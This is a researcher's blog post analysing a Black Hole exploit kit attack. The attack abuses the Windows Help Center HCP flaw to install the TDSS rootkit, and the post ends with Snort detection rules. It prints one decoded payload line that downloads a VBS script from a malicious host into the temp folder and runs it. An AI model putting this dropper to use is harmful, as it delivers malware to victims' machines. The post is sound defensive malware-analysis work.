Tuesday, January 17, 2012

JAVA/HCP/ Black Hole Exploit Kit malware analysis

By Christiaan Beek


A couple of weeks ago there was a good amount of commotion around the usage of Java and the Black Hole exploit kit to infect users. While I was in Abu Dhabi teaching class I remembered that two weeks ago we had a similar case where Java and URL-structures used by the Black Hole exploit kit were used, so I decided to write up a little post to help explain it.

The attack started with a targeted email towards a certain department containing a URL where victims could download the error-report.

This email contained a ‘suspicious’ URL:


This URL points to a site which is empty and shows the message “page is loading…wait’. In the source code of the page, the following URL’s were discovered:

In this page there are 4 URLs which are accessed – all of them contain the same JavaScript file

In the Java file, another URL is hidden:

This site was actually hosting several different pieces of malware:


Malware behavior

In an isolated lab environment, the following URL was executed to study its behavior:


The JAR file contained several instances of obfuscated code which made it slight difficult to analyze. After the first part was decoded the infection vector became clear:

The first part of the script (after eval) was obfuscated by using decimal code. First I used Malzilla, went to the tab misc decoders, and pasted the script. By selecting the right area, I clicked the option ‘decimal’ and the obfuscated piece was decoded:

Infection vector

In the first couple of lines the following can be detected: [hcp://services …. Helpctr.exe] – this points out that The Microsoft Help and Support Center URL Escaping vulnerability is being used. In the above fragment, the Escaping is done by using multiple ‘%A’s. This vulnerability is documented in CVE:2010-1885

Malware behavior continued

In the decoded part of the vulnerability the following became visible:

eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://advxxxxxxxxxx.com/content/hcp_vbs.php?f=166::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe)))

First it creates a VBS file (I.vbs) in the %TEMP% folder and initiates a GET request for another web resource through the XMLHTTP object. The web resource is another VBS file faked as a PHP file:


The ‘hcp_vbs.php?f=’ part of the URL is known to be part of the ‘Black Hole Exploit Kit’.

Blackhole Exploit Kit: ‘The Black Hole exploit kit is an unethical off-the-shelf Web application. The first instance - v.1.0.0 beta - has appeared on the black market and was advertised in August 2010 as a "System for network testing". As with most of the exploit kits, it is based on PHP and a MySQL backend. The payload of this kit usually targets Windows operating systems and an application installed on those systems, but depends on the criminals' end goal. ‘(source: http://community.websense.com/blogs/)

After the l.vbs file is created it will be executed. The heavily obfuscated code was analyzed and following interesting parts became visible:

This particular piece of the application is checking which versions of Java/PDF and Flash are on the system. Another piece of code shows that the UserAgent information is being read to determine which device or Operating System is used by the client:

This information is sent back to the Black Hole Kit gateway and available exploits will be sent back to take-over the machine and execute remote commands etc.
In my Lab, I used an un-patched version of Windows X and an outdated version of Shockwave Flash. Acrobat and Java were up to date.

Next, the delivery mechanism retrieved a variant of the TDSS rootkit.

Memory analysis

After infecting the labs machine an acquiry of the memory was taken for analysis. Using several tools it became clear that that traces of malware hooked themselves into the following (valid) Windows processes:
  • IExplorer
  • SVChost
By dumping malicious parts of the memory, I was able to compare them using our internal malware database and the website Virustotal.com. Only 7 out of 43 AntiVirus engines were capable of detecting this variant of TDSS/Alureon.


Check if your systems are patched for the HCP vulnerability:

SNORT detection rules (source Chris Wakelin)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP overflow Media
Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";
http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;
sid:2013077; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit";flow:established,to_server; content:"/pch.php?f="; http_uri;
pcre:"/pch\.php\?f=\d+$/U"; classtype:bad-unknown; sid:2013548; rev:1;)

emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET
$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP exploit 2";
flow:established,to_server; content:"/hcp_vbs.php?f="; http_uri;
pcre:"/hcp_vbs\.php\?f=\d+&d=\d+$/U"; classtype:bad-unknown; sid:2013549;

1 comment:

  1. Great post about security , Thanks cristian for sharing it with us.
    Have a nice day.